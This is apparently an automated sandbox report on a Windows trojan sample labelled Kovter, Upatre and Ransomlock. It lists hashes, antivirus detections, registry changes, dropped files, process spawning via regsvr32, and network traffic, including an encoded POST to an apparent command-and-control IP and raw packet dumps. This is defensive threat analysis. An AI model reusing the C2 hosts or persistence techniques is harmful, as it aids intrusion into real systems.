Analysis Date: 2015-09-17 15:25:26
MD5: fe51edcd5a92cb1017dac25076b9df7f
SHA1: da6935aebc6cf1cdaf86810746e324e70c384cd5

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section .text  md5: d0aa46516bc32ee4ed5407439718b419 sha1: 6e4665a69136c6ee6030e0073e68402f47ef86ad size: 365568
Section .rdata md5: 4f4725a7e6a3c934528b5505c73a5d27 sha1: 8be7096ab011311cf95feda2ae4406cb7f5a46d0 size: 112640
Section .data  md5: 4c7727f5077894ef6f37ef876754ecb5 sha1: 11543490735b53e8ccd6c62ff132fab875b371a1 size: 50688
Section .rsrc  md5: 6f887b6a452d0e5d906e5e6e871d36e8 sha1: 8ec8afbc5044316a26011d72ce410098f98c0dd2 size: 31744
Section .reloc md5: 9cece16fc2586d1135f8429b82e661de sha1: 2ffdf4498fd10c764fbdb110cec05fbe11904284 size: 12288
Timestamp: 2015-09-02 01:18:34
Pdb path: H:\moved\referenced\GPRS\challengi.pdb
Packer: Microsoft Visual C++ ?.?
PEhash: 914afbe2540626b31c4a7b00792b10ac0fb80aa8
IMPhash: 0ca8fd97d93758c8e87d0cc6211bc089
AV CA (E-Trust Ino): no_virus
AV F-Secure: Gen:Variant.Mikey.23405
AV Dr. Web: Trojan.MulDrop6.3116
AV ClamAV: no_virus
AV Arcabit (arcavir): Gen:Variant.Mikey.23405
AV BullGuard: Gen:Variant.Mikey.23405
AV Padvish: no_virus
AV VirusBlokAda (vba32): no_virus
AV CAT (quickheal): no_virus
AV Trend Micro: no_virus
AV Kaspersky: Trojan-Downloader.Win32.Upatre.eqmh
AV Zillya!: Downloader.Upatre.Win32.52139
AV Emsisoft: Gen:Variant.Mikey.23405
AV Ikarus: Trojan.Win32.Kovter
AV Frisk (f-prot): no_virus
AV Authentium: W32/Trojan.BAXR-8795
AV MalwareBytes: Trojan.Agent.ED
AV MicroWorld (escan): Gen:Variant.Mikey.23405
AV Microsoft Security Essentials: Trojan:Win32/Kovter!rfn
AV K7: Trojan ( 004c672c1 )
AV BitDefender: Gen:Variant.Mikey.23405
AV Fortinet: W32/Upatre.D!tr.dldr
AV Symantec: Trojan.Ransomlock.AK
AV Grisoft (avg): Pakes.RFR
AV Eset (nod32): Win32/Kovter.D
AV Alwil (avast): Malware-gen:Win32:Malware-gen
AV Ad-Aware: Gen:Variant.Mikey.23405
AV Twister: W32.Kovter.D.eyxa
AV Avira (antivir): TR/Crypt.Xpack.249273
AV Mcafee: GenericR-EKO!FE51EDCD5A92
AV Rising: no_virus

Runtime Details:

Process
↳ C:\malware.exe

Creates Process: regsvr32.exe

Process
↳ regsvr32.exe

Creates Process: regsvr32.exe

Process
↳ regsvr32.exe

Registry: HKEY_LOCAL_MACHINE\SOFTWARE\2a89521acd\c984f294 ➝
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)\\x00
Registry: HKEY_LOCAL_MACHINE\software\2a89521acd\7bf7927d ➝
864\\x00
Registry: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\regsvr32.exe ➝
8888
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝
1
Registry: HKEY_CURRENT_USER\software\2a89521acd\7bf7927d ➝
864\\x00
Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
NULL
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1206 ➝
NULL
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\1206 ➝
NULL
Registry: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\regsvr32.exe ➝
8888
Registry: HKEY_CURRENT_USER\SOFTWARE\2a89521acd\c984f294 ➝
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)\\x00
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Local Settings\Application Data\bufym\bufym.exe
Creates File: \Device\Afd\AsyncConnectHlp
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File: PIPE\lsarpc
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\microsoft[1].htm
Creates File: \Device\Afd\Endpoint
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\48.133.68[1].htm
Deletes File: c:\malware.exe
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\microsoft[1].htm
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\48.133.68[1].htm
Creates Process: "C:\WINDOWS\system32\regsvr32.exe"
Creates Process: "C:\WINDOWS\system32\regsvr32.exe"
Creates Mutex: c:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex: WininetConnectionMutex
Creates Mutex: c:!documents and settings!administrator!cookies!
Creates Mutex: c:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Creates Mutex: DE7B2F08C5C35678
Creates Mutex: Global\A0B9737978FF60B0
Winsock DNS: microsoft.com
Winsock DNS: 48.133.68.62

Process
↳ "C:\WINDOWS\system32\regsvr32.exe"

Creates Mutex: 5734B585673D7847

Process
↳ "C:\WINDOWS\system32\regsvr32.exe"

Network Details:

DNS: microsoft.com
Type: A
134.170.185.46
DNS: microsoft.com
Type: A
134.170.188.221
DNS: a767.dscms.akamai.net
Type: A
23.3.98.10
DNS: a767.dscms.akamai.net
Type: A
23.3.98.32
DNS: download.microsoft.com
Type: A
HTTP GET: http://microsoft.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POST: http://48.133.68.62/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GET: http://download.microsoft.com/download/0/8/c/08c19fa4-4c4f-4ffb-9d6c-150906578c9e/NetFx20SP1_x86.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Flows TCP: 192.168.1.1:1031 ➝ 134.170.185.46:80
Flows TCP: 192.168.1.1:1032 ➝ 48.133.68.62:80
Flows TCP: 192.168.1.1:1033 ➝ 170.26.181.108:80
Flows TCP: 192.168.1.1:1034 ➝ 109.113.250.134:80
Flows TCP: 192.168.1.1:1035 ➝ 48.133.68.62:80
Flows TCP: 192.168.1.1:1036 ➝ 166.69.185.171:443
Flows TCP: 192.168.1.1:1037 ➝ 23.3.98.10:80
Flows TCP: 192.168.1.1:1040 ➝ 132.35.119.135:80
Flows TCP: 192.168.1.1:1041 ➝ 166.46.144.206:80
Flows TCP: 192.168.1.1:1042 ➝ 111.201.43.1:80
Flows TCP: 192.168.1.1:1043 ➝ 52.79.142.149:443
Flows TCP: 192.168.1.1:1044 ➝ 87.144.78.186:8080
Flows TCP: 192.168.1.1:1045 ➝ 62.53.183.185:80
Flows TCP: 192.168.1.1:1047 ➝ 111.255.153.143:80
Flows TCP: 192.168.1.1:1048 ➝ 75.251.248.218:80
Flows TCP: 192.168.1.1:1052 ➝ 185.158.195.219:80
Flows TCP: 192.168.1.1:1053 ➝ 118.90.149.27:443
Flows TCP: 192.168.1.1:1054 ➝ 50.103.225.29:8080
Flows TCP: 192.168.1.1:1055 ➝ 40.232.110.18:80
Flows TCP: 192.168.1.1:1056 ➝ 179.42.254.142:80
Flows TCP: 192.168.1.1:1057 ➝ 164.180.21.226:8080
Flows TCP: 192.168.1.1:1058 ➝ 38.78.237.170:80
Flows TCP: 192.168.1.1:1059 ➝ 17.36.58.137:80
Flows TCP: 192.168.1.1:1060 ➝ 62.69.93.244:80

Raw Pcap
0x00000000 (00000)   47455420 2f204854 54502f31 2e310d0a   GET / HTTP/1.1..
0x00000010 (00016)   55736572 2d416765 6e743a20 4d6f7a69   User-Agent: Mozi
0x00000020 (00032)   6c6c612f 342e3020 28636f6d 70617469   lla/4.0 (compati
0x00000030 (00048)   626c653b 204d5349 4520362e 303b2057   ble; MSIE 6.0; W
0x00000040 (00064)   696e646f 7773204e 5420352e 313b2053   indows NT 5.1; S
0x00000050 (00080)   56313b20 2e4e4554 20434c52 20322e30   V1; .NET CLR 2.0
0x00000060 (00096)   2e353037 3237290d 0a486f73 743a206d   .50727)..Host: m
0x00000070 (00112)   6963726f 736f6674 2e636f6d 0d0a4361   icrosoft.com..Ca
0x00000080 (00128)   6368652d 436f6e74 726f6c3a 206e6f2d   che-Control: no-
0x00000090 (00144)   63616368 650d0a0d 0a                  cache....

0x00000000 (00000)   ad                                    .

0x00000000 (00000)   504f5354 202f2048 5454502f 312e310d   POST / HTTP/1.1.
0x00000010 (00016)   0a436f6e 74656e74 2d547970 653a2061   .Content-Type: a
0x00000020 (00032)   70706c69 63617469 6f6e2f78 2d777777   pplication/x-www
0x00000030 (00048)   2d666f72 6d2d7572 6c656e63 6f646564   -form-urlencoded
0x00000040 (00064)   0d0a5573 65722d41 67656e74 3a204d6f   ..User-Agent: Mo
0x00000050 (00080)   7a696c6c 612f342e 30202863 6f6d7061   zilla/4.0 (compa
0x00000060 (00096)   7469626c 653b204d 53494520 362e303b   tible; MSIE 6.0;
0x00000070 (00112)   2057696e 646f7773 204e5420 352e313b    Windows NT 5.1;
0x00000080 (00128)   20535631 3b202e4e 45542043 4c522032    SV1; .NET CLR 2
0x00000090 (00144)   2e302e35 30373237 290d0a48 6f73743a   .0.50727)..Host:
0x000000a0 (00160)   2034382e 3133332e 36382e36 320d0a43    48.133.68.62..C
0x000000b0 (00176)   6f6e7465 6e742d4c 656e6774 683a2033   ontent-Length: 3
0x000000c0 (00192)   38340d0a 43616368 652d436f 6e74726f   84..Cache-Contro
0x000000d0 (00208)   6c3a206e 6f2d6361 6368650d 0a0d0a49   l: no-cache....I
0x000000e0 (00224)   32305269 73553955 6c366134 6d513137   20RisU9Ul6a4mQ17
0x000000f0 (00240)   724e426e 6e776333 33542b70 53544548   rNBnnwc33T+pSTEH
0x00000100 (00256)   316c7a37 3974795a 424f462f 526c7355   1lz79tyZBOF/RlsU
0x00000110 (00272)   7175712f 4a65764f 534e6447 456f6e6e   quq/JevOSNdGEonn
0x00000120 (00288)   44486950 79765a79 6439416d 32555264   DHiPyvZyd9Am2URd
0x00000130 (00304)   4e6d3245 6d4c6c59 646b3372 42766e61   Nm2EmLlYdk3rBvna
0x00000140 (00320)   4e7a6f56 3244535a 75317467 6f306d43   NzoV2DSZu1tgo0mC
0x00000150 (00336)   79443043 524e6e49 6c556d43 39675a47   yD0CRNnIlUmC9gZG
0x00000160 (00352)   58795438 4a464575 344d4c52 6f684b6a   XyT8JFEu4MLRohKj
0x00000170 (00368)   76715733 75367948 71346769 73373879   vqW3u6yHq4gis78y
0x00000180 (00384)   4a32476f 45594778 736f7078 3769336f   J2GoEYGxsopx7i3o
0x00000190 (00400)   486b6262 4e71705a 41415658 684a6431   HkbbNqpZAAVXhJd1
0x000001a0 (00416)   48734839 7555572f 7a7a6373 4d306d77   HsH9uUW/zzcsM0mw
0x000001b0 (00432)   7170494c 546a2f2b 626e6f70 49786732   qpILTj/+bnopIxg2
0x000001c0 (00448)   6c627852 33314d49 485a7261 6f75544c   lbxR31MIHZraouTL
0x000001d0 (00464)   696c6743 4c776667 437a6831 70534a53   ilgCLwfgCzh1pSJS
0x000001e0 (00480)   36464737 46367644 77516342 32375850   6FG7F6vDwQcB27XP
0x000001f0 (00496)   6c534c65 41482b48 334c5354 527a594e   lSLeAH+H3LSTRzYN
0x00000200 (00512)   4b6d4173 6a70645a 4a493258 6d596462   KmAsjpdZJI2XmYdb
0x00000210 (00528)   4f74332b 74325154 5a64704f 6e2b2b78   Ot3+t2QTZdpOn++x
0x00000220 (00544)   4268476d 38546a6b 676a6845 47736234   BhGm8TjkgjhEGsb4
0x00000230 (00560)   79477655 46723768 2f766e48 4f4b3875   yGvUFr7h/vnHOK8u
0x00000240 (00576)   63445a62 46484132 43554238 4e6b3465   cDZbFHA2CUB8Nk4e
0x00000250 (00592)   4f646569 504b5943 4f4e4131 513d3d     OdeiPKYCONA1Q==

0x00000000 (00000)   47455420 2f646f77 6e6c6f61 642f302f   GET /download/0/
0x00000010 (00016)   382f632f 30386331 39666134 2d346334   8/c/08c19fa4-4c4
0x00000020 (00032)   662d3466 66622d39 6436632d 31353039   f-4ffb-9d6c-1509
0x00000030 (00048)   30363537 38633965 2f4e6574 46783230   06578c9e/NetFx20
0x00000040 (00064)   5350315f 7838362e 65786520 48545450   SP1_x86.exe HTTP
0x00000050 (00080)   2f312e31 0d0a5573 65722d41 67656e74   /1.1..User-Agent
0x00000060 (00096)   3a204d6f 7a696c6c 612f342e 30202863   : Mozilla/4.0 (c
0x00000070 (00112)   6f6d7061 7469626c 653b204d 53494520   ompatible; MSIE 
0x00000080 (00128)   362e303b 2057696e 646f7773 204e5420   6.0; Windows NT 
0x00000090 (00144)   352e313b 20535631 3b202e4e 45542043   5.1; SV1; .NET C
0x000000a0 (00160)   4c522032 2e302e35 30373237 290d0a48   LR 2.0.50727)..H
0x000000b0 (00176)   6f73743a 20646f77 6e6c6f61 642e6d69   ost: download.mi
0x000000c0 (00192)   63726f73 6f66742e 636f6d0d 0a436163   crosoft.com..Cac
0x000000d0 (00208)   68652d43 6f6e7472 6f6c3a20 6e6f2d63   he-Control: no-c
0x000000e0 (00224)   61636865 0d0a0d0a 68697320 69732074   ache....his is t
0x000000f0 (00240)   68652072 65616c2d 6d6f6465 20746573   he real-mode tes
0x00000100 (00256)   74207061 67652e2e 2e3c2f68 333e0a09   t page...</h3>..
0x00000110 (00272)   093c696d 67207372 633d226c 6f676f2e   .<img src="logo.
0x00000120 (00288)   67696622 3e0a2020 3c2f626f 64793e0a   gif">.  </body>.
0x00000130 (00304)   3c2f6874 6d6c3e0a                     </html>.

0x00000000 (00000)   a9                                    .

0x00000000 (00000)   a5                                    .

0x00000000 (00000)   b5                                    .

0x00000000 (00000)   76                                    v

0x00000000 (00000)   60                                    `

0x00000000 (00000)   7c                                    |

0x00000000 (00000)   aa                                    .

0x00000000 (00000)   79                                    y

0x00000000 (00000)   be                                    .

0x00000000 (00000)   b1                                    .

0x00000000 (00000)   aa                                    .

0x00000000 (00000)   9a                                    .

0x00000000 (00000)   94                                    .

0x00000000 (00000)   b6                                    .

0x00000000 (00000)   9a                                    .

0x00000000 (00000)   93                                    .

0x00000000 (00000)   ae                                    .

0x00000000 (00000)   b8                                    .

0x00000000 (00000)   3d                                    =

0x00000000 (00000)   6c                                    l
Strings